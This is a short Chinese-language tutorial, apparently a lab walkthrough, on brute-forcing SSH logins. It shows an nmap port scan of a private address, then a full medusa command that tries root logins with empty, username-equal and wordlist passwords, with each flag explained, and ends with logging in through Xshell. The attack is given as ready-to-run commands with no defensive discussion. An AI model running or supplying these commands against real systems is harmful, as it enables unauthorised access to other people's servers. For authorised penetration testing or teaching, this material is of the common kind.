1.扫描IP地址,查看有哪些开放的端口
root@kali:~# nmap -Pn 172.25.0.12
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 11:36 CST
Nmap scan report for 172.25.0.12
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
2.利用medusa破解ssh
root@kali:~# medusa -M ssh -h 172.25.0.12 -e ns -F -u root -P /usr/share/wordlists/nmap.lst
参数:
-M #攻击模块的执行名称
-h #攻击IP
-e #n意为空密码,s意为密码与用户名相同
-F #破解到一个正确的密码即退出
-P #密码字典
/usr/share/wordlists/ #这里是Kali软件自带的密码字典存放路径
3.连接Xshell,验证密码